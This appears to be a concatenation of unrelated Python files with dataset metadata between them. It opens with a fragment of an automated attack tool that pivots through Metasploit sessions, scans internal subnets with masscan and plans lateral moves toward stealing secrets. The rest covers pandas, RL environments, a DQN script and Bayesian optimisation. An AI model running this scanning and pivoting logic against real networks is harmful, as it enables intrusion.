#print("Starting a Network Scan...")
self.mlogger.writelog("Starting a Network Scan...", "info")
exploit = msploit.MetaSploit()
exploit.execute_socks()
ipaddr_list = {}
getnw_list = []
self.scan_from_network_info(ipaddr_list, getnw_list)
if len(ipaddr_list) == 0 and len(getnw_list) != 0:
print("getnw_list = {}".format(getnw_list))
self.force_get_networkinfo(goap_node, node_id, ipaddr_list, getnw_list)
if len(ipaddr_list) > 0:
print("ipaddr_list = {}".format(ipaddr_list))
for scan_ip, node_num in ipaddr_list.items():
print("scan_ip = {}, node_num = {}".format(scan_ip, node_num))
#exploit = msploit.MetaSploit()
exploit.setting_route(scan_ip, "255.255.255.255", self.node[node_num]["session"])
nwscan = masscan.MasScan()
node_id = nwscan.execute_masscan(scan_ip, self.node[node_num]["id"], self.node, self.link, node_id)
else:
session_exist_list = {}
#for num in range(1, len(self.node)):
for num in range(len(self.node)-1, -1, -1):
if self.node[num]["session"] != "":
session_exist_list[self.node[num]["id"]] = num
if (len(session_exist_list) > 0):
nwscan = masscan.MasScan()
pre_node_id = node_id
for ipaddr, node_num in session_exist_list.items():
print("scan_src_ipaddr= {}".format(ipaddr))
s2 = ipaddr.split('.')
if (s2[0] == "10"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 10)
if node_id > pre_node_id:
break
elif (s2[0] == "172"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 172)
if node_id > pre_node_id:
break
elif (s2[0] == "192"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 192)
if node_id > pre_node_id:
break
else:
nwscan = masscan.MasScan()
pre_node_id = node_id
s2 = self.mushikago_ipaddr.split('.')
if (s2[0] == "10"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 10)
elif (s2[0] == "172"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 172)
elif (s2[0] == "192"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 192)
self.wjson.write(self.node_json)
self.wcsv.write(["T1046 (network scan)", self.pre_exe, self.mushikago_ipaddr, "T1046"])
self.pre_exe = "T1046 (network scan)"
return node_id
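The planning loop in goap_plannning above reduces to: collect the actions whose preconditions match the current symbol state, pick the one with the lowest priority value that is not already planned, and apply its effects until a goal symbol is reached. The sketch below is a self-contained illustration of that loop with a made-up three-action set (it is not the contents of actions-it.json, and it omits the random tie-breaking among equal priorities).
actions = {
    "arpscan": {"precond": {}, "effect": {"Symbol_GetLanNodes": True}, "priority": 1},
    "tcpscan": {"precond": {"Symbol_GetLanNodes": True}, "effect": {"Symbol_TcpScan": True}, "priority": 2},
    "exploit_lateral": {"precond": {"Symbol_TcpScan": True}, "effect": {"GoalSymbol_GetLocalSecretInfo": True}, "priority": 3},
}
state = {"Symbol_GetLanNodes": None, "Symbol_TcpScan": None, "GoalSymbol_GetLocalSecretInfo": None}
goal = {"GoalSymbol_GetLocalSecretInfo": True}

plan = []
while state["GoalSymbol_GetLocalSecretInfo"] != goal["GoalSymbol_GetLocalSecretInfo"]:
    # actions whose preconditions all match the current symbol state
    available = [name for name, act in actions.items()
                 if name not in plan and all(state[s] == v for s, v in act["precond"].items())]
    if not available:
        break
    best = min(available, key=lambda name: actions[name]["priority"])  # lowest priority value wins
    plan.append(best)
    state.update(actions[best]["effect"])  # apply the chosen action's effects

print(plan)  # ['arpscan', 'tcpscan', 'exploit_lateral']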
| 36.139118
| 293
| 0.614285
|
d8dd6bfadb056408f98c24475be1fe9ce25d2c20
| 260
|
py
|
Python
|
show_df_as_html_table.py
|
NathanKr/pandas-playground
|
a5355c59cb61ca3a7dcce590ed42d56a6b943783
|
[
"MIT"
] | null | null | null |
show_df_as_html_table.py
|
NathanKr/pandas-playground
|
a5355c59cb61ca3a7dcce590ed42d56a6b943783
|
[
"MIT"
] | null | null | null |
show_df_as_html_table.py
|
NathanKr/pandas-playground
|
a5355c59cb61ca3a7dcce590ed42d56a6b943783
|
[
"MIT"
] | null | null | null |
import pandas as pd
import os
url = 'https://en.wikipedia.org/wiki/List_of_S%26P_500_companies'
snp500_df = pd.read_html(url)[0]
file_path = os.path.join('temp','snp500_df_to_html.html')
print(f'write snp500_df to {file_path}')
snp500_df.to_html(file_path)
| 23.636364
| 65
| 0.769231
|
02d408487f0686824a537a752d9cda4a49647270
| 1,358
|
py
|
Python
|
Ryven_NodeManager/Node.py
|
lidong1266/Ryven-Switch
|
68d1f71e81d6564196f44ca49d5903f06db6a4d9
|
[
"MIT"
] | 18
|
2021-01-18T09:52:41.000Z
|
2022-03-22T10:48:44.000Z
|
Ryven_NodeManager/Node.py
|
xamofb-xsk/Ryven
|
8c3dcc613098863ae9fb747e62c0bb9d9eb4cef1
|
[
"MIT"
] | null | null | null |
Ryven_NodeManager/Node.py
|
xamofb-xsk/Ryven
|
8c3dcc613098863ae9fb747e62c0bb9d9eb4cef1
|
[
"MIT"
] | 3
|
2021-01-18T09:49:42.000Z
|
2022-03-22T10:48:47.000Z
|
from PySide2.QtCore import QObject, Signal
class Node(QObject): # QObject inheritance for the Signal
"""All values are initial! They get set when nodes are imported but do not get synchronized yet when the
NodeContentWidget is being changed. When exporting, all info comes from the NodeContentWidget."""
title_changed = Signal()
def __init__(self, content_nodes_widget=None):
super(Node, self).__init__()
self.title = 'new node'
self.type = ''
self.description = ''
self.module_name = ''
self.class_name = None
self.design_style = ''
self.color = ''
self.has_main_widget = False
self.widget_position = ''
self.custom_input_widgets = []
self.custom_input_widget_metacodes = []
self.custom_input_widget_metacodes_file_paths = []
self.inputs = []
self.outputs = []
# src code
f = open('template files/node_instance_default_template.txt', 'r')
self.meta_code = f.read()
f.close()
self.meta_code_file_path = None
# main widget code
f = open('template files/main_widget_default_template.txt', 'r')
self.main_widget_meta_code = f.read()
f.close()
self.main_widget_meta_code_file_path = None
self.content_widget = content_nodes_widget
| 34.820513
| 108
| 0.642121
|
183196fb7a7256d985e673ffcbe4c86973729ed4
| 1,264
|
py
|
Python
|
snippets/applyF_filterG-function.midterm-exam-Problem8.py
|
coshkun/6.00.1x-MITx-Course-Training-Lab-Notes
|
63e755dc81fd50a7b1372074a4a73e50021a233b
|
[
"MIT"
] | null | null | null |
snippets/applyF_filterG-function.midterm-exam-Problem8.py
|
coshkun/6.00.1x-MITx-Course-Training-Lab-Notes
|
63e755dc81fd50a7b1372074a4a73e50021a233b
|
[
"MIT"
] | null | null | null |
snippets/applyF_filterG-function.midterm-exam-Problem8.py
|
coshkun/6.00.1x-MITx-Course-Training-Lab-Notes
|
63e755dc81fd50a7b1372074a4a73e50021a233b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 14 13:51:35 2017
@author: coskun
Midterm Exam > Problem 8
20.0 points possible (graded)
Implement the function applyF_filterG below;
f, g, and L will be supplied by the system
"""
#Sample Definitions
def f(i):
return i + 2
def g(i):
return i > 5
L = [0, -10, 5, 6, -4]
#Problem Snippet
def applyF_filterG(L, f, g):
"""
Assumes L is a list of integers
Assume functions f and g are defined for you.
f takes in an integer, applies a function, returns another integer
g takes in an integer, applies a Boolean function,
returns either True or False
Mutates L such that, for each element i originally in L, L contains
i if g(f(i)) returns True, and no other elements
Returns the largest element in the mutated L or -1 if the list is empty
"""
# Your code here
mList = []
tmp = 0
#Calc New List
for i in L:
if g(f(i)):
mList.append(i)
#Apply Mutation
L.clear()
for i in mList:
L.append(i)
#Calc Retun Value
if len(mList) == 0:
return -1
else:
for i in mList:
tmp = max(tmp, i)
return tmp
print(applyF_filterG(L, f, g))
print(L)
| 21.793103
| 75
| 0.599684
|
a1f3c3d4ddd343ecb1ca912124b175e1a14ae9cd
| 16,852
|
py
|
Python
|
environment.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
environment.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
environment.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
"""This module contains various experimental environments used for testing
human behavior."""
import numpy as np
class GridWorld(object):
def __init__(self, Omega, Theta, Rho,
trials = 1, T = 10, initial_state = 2):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
#set intial state
self.initial_state = initial_state
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = self.initial_state
if tau%100==0:
print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[0], p = self.Rho[:, self.hidden_states[tau, t]])
return r
"""
test: please ignore
"""
class FakeGridWorld(object):
def __init__(self, Omega, Theta,
hidden_states, trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:] = np.array([hidden_states for i in range(trials)])
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 1
#print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
class MultiArmedBandid(object):
def __init__(self, Omega, Theta, Rho,
trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
# self.changes = np.array([0.01, -0.01])
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.trials = trials
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 0
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
# if tau < self.trials-1:
# #change Rho slowly
# change = np.random.choice(self.changes, size=self.nh-1)
# self.Rho[tau+1,0,1:] = self.Rho[tau,0,1:] + change
# self.Rho[tau+1,1,1:] = self.Rho[tau,1,1:] - change
# self.Rho[tau+1][self.Rho[tau+1] > 1.] = 1.
# self.Rho[tau+1][self.Rho[tau+1] < 0.] = 0.
return r
class TaskSwitching(object):
def __init__(self, Omega, Theta, Rho, Chi, start_states, contexts,
trials = 1, T = 10, correct_choice=None, congruent=None,
num_in_run=None):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
self.Chi = Chi.copy()
# self.changes = np.array([0.01, -0.01])
        assert len(start_states) == trials
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:,0] = start_states
self.contexts = contexts.copy().astype(int)
self.trials = trials
if correct_choice is not None:
self.correct_choice = correct_choice
if congruent is not None:
self.congruent = congruent
if num_in_run is not None:
self.num_in_run = num_in_run
def set_initial_states(self, tau):
#start in lower corner
#self.hidden_states[tau, 0] = 0
pass
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
current_context = self.contexts[tau]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response), current_context])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
# if tau < self.trials-1:
# #change Rho slowly
# change = np.random.choice(self.changes, size=self.nh-1)
# self.Rho[tau+1,0,1:] = self.Rho[tau,0,1:] + change
# self.Rho[tau+1,1,1:] = self.Rho[tau,1,1:] - change
# self.Rho[tau+1][self.Rho[tau+1] > 1.] = 1.
# self.Rho[tau+1][self.Rho[tau+1] < 0.] = 0.
return r
def generate_context_obs(self, tau):
c = np.random.choice(self.Chi.shape[0], p=self.Chi[self.contexts[tau]])
return c
class TaskSwitchingOneConext(object):
def __init__(self, Omega, Theta, Rho, Chi, start_states, contexts,
trials = 1, T = 10, correct_choice=None, congruent=None,
num_in_run=None):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
self.Chi = Chi.copy()
# self.changes = np.array([0.01, -0.01])
        assert len(start_states) == trials
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:,0] = start_states
self.contexts = contexts.copy().astype(int)
self.trials = trials
if correct_choice is not None:
self.correct_choice = correct_choice
if congruent is not None:
self.congruent = congruent
if num_in_run is not None:
self.num_in_run = num_in_run
def set_initial_states(self, tau):
#start in lower corner
#self.hidden_states[tau, 0] = 0
pass
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)][:,0])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
current_context = self.contexts[tau]
r = np.random.choice(self.Rho.shape[0], p = self.Rho[:, self.hidden_states[tau, t], current_context])
# if tau < self.trials-1:
# #change Rho slowly
# change = np.random.choice(self.changes, size=self.nh-1)
# self.Rho[tau+1,0,1:] = self.Rho[tau,0,1:] + change
# self.Rho[tau+1,1,1:] = self.Rho[tau,1,1:] - change
# self.Rho[tau+1][self.Rho[tau+1] > 1.] = 1.
# self.Rho[tau+1][self.Rho[tau+1] < 0.] = 0.
return r
def generate_context_obs(self, tau):
#c = np.random.choice(self.Chi.shape[0], p=self.Chi[self.contexts[tau]])
return 0#c
class Flanker(object):
def __init__(self, Omega, Theta, Rho, Chi, start_states, contexts, flankers,
trials = 1, T = 10, correct_choice=None, congruent=None):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
self.Chi = Chi.copy()
# self.changes = np.array([0.01, -0.01])
        assert len(start_states) == trials
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:,0] = start_states
self.contexts = contexts.copy().astype(int)
self.flankers = flankers.copy()
self.trials = trials
if correct_choice is not None:
self.correct_choice = correct_choice
if congruent is not None:
self.congruent = congruent
def set_initial_states(self, tau):
#start in lower corner
#self.hidden_states[tau, 0] = 0
pass
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
current_context = self.contexts[tau]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response), current_context])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
# if tau < self.trials-1:
# #change Rho slowly
# change = np.random.choice(self.changes, size=self.nh-1)
# self.Rho[tau+1,0,1:] = self.Rho[tau,0,1:] + change
# self.Rho[tau+1,1,1:] = self.Rho[tau,1,1:] - change
# self.Rho[tau+1][self.Rho[tau+1] > 1.] = 1.
# self.Rho[tau+1][self.Rho[tau+1] < 0.] = 0.
return r
def generate_context_obs(self, tau):
c = np.random.choice(self.Chi.shape[0], p=self.Chi[self.contexts[tau]])
return c
class TMaze(object):
def __init__(self, Omega, Theta, Rho,
trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
# self.changes = np.array([0.01, -0.01])
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.trials = trials
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 0
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
return r
class TwoStep(object):
def __init__(self, Omega, Theta, Rho,
trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
self.Rho[0] = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
self.changes = np.array([0.01, -0.01])
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.trials = trials
self.T = T
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 0
if tau%100==0:
print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
if (tau < self.trials-1) and t == self.T-1:
#change Rho slowly
self.Rho[tau+1] = self.Rho[tau]
change = np.random.choice(self.changes, size=self.nh - 3)
self.Rho[tau+1,0,3:] = self.Rho[tau+1,0,3:] + change
self.Rho[tau+1,1,3:] = self.Rho[tau+1,1,3:] - change
self.Rho[tau+1,:,3:][self.Rho[tau+1,:,3:] > 1.] = 1.
self.Rho[tau+1,:,3:][self.Rho[tau+1,:,3:] < 0.] = 0.
return r
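A minimal sketch of how MultiArmedBandid expects its distributions to be shaped (Omega: observations x states, Theta: next state x current state x action, Rho: trials x reward values x states, matching the indexing used in generate_rewards) and how a single trial step runs. The small matrices and probabilities below are illustrative.
import numpy as np

nh, na, nr, trials, T = 3, 2, 2, 1, 2           # states, actions, reward values, trials, time steps
Omega = np.eye(nh)                              # observation likelihoods: columns index hidden states
Theta = np.zeros((nh, nh, na))                  # transition kernel: next state x current state x action
for a in range(na):
    Theta[a + 1, :, a] = 1.0                    # choosing arm a deterministically leads to state a+1
Rho = np.zeros((trials, nr, nh))                # per-trial reward distributions over reward values x states
Rho[:, :, 0] = [1.0, 0.0]                       # start state never pays
Rho[:, :, 1] = [0.2, 0.8]                       # arm 1 pays with probability 0.8
Rho[:, :, 2] = [0.7, 0.3]                       # arm 2 pays with probability 0.3

env = MultiArmedBandid(Omega, Theta, Rho, trials=trials, T=T)
env.set_initial_states(0)
obs = env.generate_observations(0, 0)           # observe the start state
env.update_hidden_states(0, 1, 0)               # pull arm 0 -> hidden state 1
reward = env.generate_rewards(0, 1)             # sample a reward for the new state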
| 32.978474
| 109
| 0.600641
|
99784635adee2c9e95c8d80a7b42ced0195df238
| 418
|
py
|
Python
|
pinkfish/tests/test_config.py
|
simongarisch/pinkfish
|
1265b6642e2990dd84fb65353cf44965d85c7083
|
[
"MIT"
] | 1
|
2020-03-31T04:02:19.000Z
|
2020-03-31T04:02:19.000Z
|
pinkfish/tests/test_config.py
|
simongarisch/pinkfish
|
1265b6642e2990dd84fb65353cf44965d85c7083
|
[
"MIT"
] | null | null | null |
pinkfish/tests/test_config.py
|
simongarisch/pinkfish
|
1265b6642e2990dd84fb65353cf44965d85c7083
|
[
"MIT"
] | null | null | null |
import os
import pinkfish as pf
def get_test_config_path(*args):
''' Returns the path to a .pinkfish config file
in the tests directory.
'''
dire_path = os.path.dirname(os.path.abspath(__file__))
file_path = os.path.join(dire_path, ".pinkfish")
return file_path
def read_config_for_tests():
conf = {}
conf["base_dir"] = os.path.dirname(os.path.abspath(__file__))
return conf
| 24.588235
| 65
| 0.681818
|
d198809dec1ca16ffebb8a83f0335cb49d10d82b
| 548
|
py
|
Python
|
DQN/CNN_DQN/main.py
|
imhgchoi/pytorch_implementations
|
e6add9991b23604a8ef1b4a34391f3014db6bbbd
|
[
"MIT"
] | 3
|
2021-01-16T13:33:15.000Z
|
2021-12-04T12:06:05.000Z
|
DQN/CNN_DQN/main.py
|
imhgchoi/pytorch_implementations
|
e6add9991b23604a8ef1b4a34391f3014db6bbbd
|
[
"MIT"
] | null | null | null |
DQN/CNN_DQN/main.py
|
imhgchoi/pytorch_implementations
|
e6add9991b23604a8ef1b4a34391f3014db6bbbd
|
[
"MIT"
] | 1
|
2021-04-25T13:37:03.000Z
|
2021-04-25T13:37:03.000Z
|
from CNN_DQN.environment import Environment
from CNN_DQN.agent import Agent
from CNN_DQN.learner import Learner
if __name__ == '__main__' :
LEARNING_RATE = 0.005
MAX_MEMORY = 10000
BATCH_SIZE = 300
EPISODE = 50000
TARGET_UPDATE = 20
EPS_START = 0.9
EPS_END = 0.05
EPS_DECAY = 200
GAMMA = 0.999
env = Environment()
agent = Agent(LEARNING_RATE, MAX_MEMORY, BATCH_SIZE, EPS_START, EPS_END, EPS_DECAY, GAMMA)
learner = Learner(env, agent, EPISODE, TARGET_UPDATE)
learner.learn()
| 27.4
| 95
| 0.675182
|
0fe092e92342aa85749b6caefcedad63a554967b
| 11,729
|
py
|
Python
|
trieste/bayesian_optimizer.py
|
icouckuy/trieste
|
92e6e51bb218e2215f93cf3994b4ce9d8a4743dc
|
[
"Apache-2.0"
] | null | null | null |
trieste/bayesian_optimizer.py
|
icouckuy/trieste
|
92e6e51bb218e2215f93cf3994b4ce9d8a4743dc
|
[
"Apache-2.0"
] | null | null | null |
trieste/bayesian_optimizer.py
|
icouckuy/trieste
|
92e6e51bb218e2215f93cf3994b4ce9d8a4743dc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Trieste Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains the :class:`BayesianOptimizer` class, used to perform Bayesian optimization.
"""
from __future__ import annotations
import copy
import traceback
from dataclasses import dataclass
from typing import Generic, List, Mapping, Optional, Tuple, TypeVar, cast, overload
import gpflow
import tensorflow as tf
from absl import logging
from .acquisition.rule import OBJECTIVE, AcquisitionRule, EfficientGlobalOptimization
from .data import Dataset
from .models import ModelSpec, TrainableProbabilisticModel, create_model
from .observer import Observer
from .space import SearchSpace
from .utils import Err, Ok, Result
S = TypeVar("S")
""" Unbound type variable. """
SP = TypeVar("SP", bound=SearchSpace)
""" Type variable bound to :class:`SearchSpace`. """
@dataclass(frozen=True)
class Record(Generic[S]):
""" Container to record the state of each step of the optimization process. """
datasets: Mapping[str, Dataset]
""" The known data from the observer. """
models: Mapping[str, TrainableProbabilisticModel]
""" The models over the :attr:`datasets`. """
acquisition_state: Optional[S]
""" The acquisition state. """
# this should be a generic NamedTuple, but mypy doesn't support them
# https://github.com/python/mypy/issues/685
@dataclass(frozen=True)
class OptimizationResult(Generic[S]):
""" The final result, and the historical data of the optimization process. """
final_result: Result[Record[S]]
"""
The final result of the optimization process. This contains either a :class:`Record` or an
exception.
"""
history: List[Record[S]]
r"""
The history of the :class:`Record`\ s from each step of the optimization process. These
:class:`Record`\ s are created at the *start* of each loop, and as such will never include the
:attr:`final_result`.
"""
def astuple(self) -> Tuple[Result[Record[S]], List[Record[S]]]:
"""
**Note:** In contrast to the standard library function :func:`dataclasses.astuple`, this
method does *not* deepcopy instance attributes.
:return: The :attr:`final_result` and :attr:`history` as a 2-tuple.
"""
return self.final_result, self.history
def try_get_final_datasets(self) -> Mapping[str, Dataset]:
"""
Convenience method to attempt to get the final data.
:return: The final data, if the optimization completed successfully.
:raise Exception: If an exception occurred during optimization.
"""
return self.final_result.unwrap().datasets
def try_get_final_models(self) -> Mapping[str, TrainableProbabilisticModel]:
"""
Convenience method to attempt to get the final models.
:return: The final models, if the optimization completed successfully.
:raise Exception: If an exception occurred during optimization.
"""
return self.final_result.unwrap().models
class BayesianOptimizer(Generic[SP]):
"""
This class performs Bayesian optimization, the data-efficient optimization of an expensive
black-box *objective function* over some *search space*. Since we may not have access to the
objective function itself, we speak instead of an *observer* that observes it.
"""
def __init__(self, observer: Observer, search_space: SP):
"""
:param observer: The observer of the objective function.
:param search_space: The space over which to search. Must be a
:class:`~trieste.space.SearchSpace`.
"""
self._observer = observer
self._search_space = search_space
def __repr__(self) -> str:
""""""
return f"BayesianOptimizer({self._observer!r}, {self._search_space!r})"
@overload
def optimize(
self,
num_steps: int,
datasets: Mapping[str, Dataset],
model_specs: Mapping[str, ModelSpec],
*,
track_state: bool = True,
) -> OptimizationResult[None]:
...
@overload
def optimize(
self,
num_steps: int,
datasets: Mapping[str, Dataset],
model_specs: Mapping[str, ModelSpec],
acquisition_rule: AcquisitionRule[S, SP],
acquisition_state: Optional[S] = None,
*,
track_state: bool = True,
) -> OptimizationResult[S]:
...
def optimize(
self,
num_steps: int,
datasets: Mapping[str, Dataset],
model_specs: Mapping[str, ModelSpec],
acquisition_rule: Optional[AcquisitionRule[S, SP]] = None,
acquisition_state: Optional[S] = None,
*,
track_state: bool = True,
) -> OptimizationResult[S]:
"""
Attempt to find the minimizer of the ``observer`` in the ``search_space`` (both specified at
:meth:`__init__`). This is the central implementation of the Bayesian optimization loop.
For each step in ``num_steps``, this method:
- Finds the next points with which to query the ``observer`` using the
``acquisition_rule``'s :meth:`acquire` method, passing it the ``search_space``,
``datasets``, models built from the ``model_specs``, and current acquisition state.
- Queries the ``observer`` *once* at those points.
- Updates the datasets and models with the data from the ``observer``.
If any errors are raised during the optimization loop, this method will catch and return
them instead, along with the history of the optimization process, and print a message (using
`absl` at level `logging.ERROR`).
**Note:** While the :class:`~trieste.models.TrainableProbabilisticModel` interface implies
mutable models, it is *not* guaranteed that the model passed to :meth:`optimize` will be
updated during the optimization process. For example, if ``track_state`` is `True`, a copied
model will be used on each optimization step. Use the models in the return value for
reliable access to the updated models.
**Type hints:**
- The ``acquisition_rule`` must use the same type of
:class:`~trieste.space.SearchSpace` as specified in :meth:`__init__`.
- The ``acquisition_state`` must be of the type expected by the ``acquisition_rule``.
Any acquisition state in the optimization result will also be of this type.
:param num_steps: The number of optimization steps to run.
:param datasets: The known observer query points and observations for each tag.
:param model_specs: The model to use for each :class:`~trieste.data.Dataset` in
``datasets``.
:param acquisition_rule: The acquisition rule, which defines how to search for a new point
on each optimization step. Defaults to
:class:`~trieste.acquisition.rule.EfficientGlobalOptimization` with default
arguments. Note that if the default is used, this implies the tags must be
`OBJECTIVE`, the search space can be any :class:`~trieste.space.SearchSpace`, and the
acquisition state returned in the :class:`OptimizationResult` will be `None`.
:param acquisition_state: The acquisition state to use on the first optimization step.
This argument allows the caller to restore the optimization process from an existing
:class:`Record`.
:param track_state: If `True`, this method saves the optimization state at the start of each
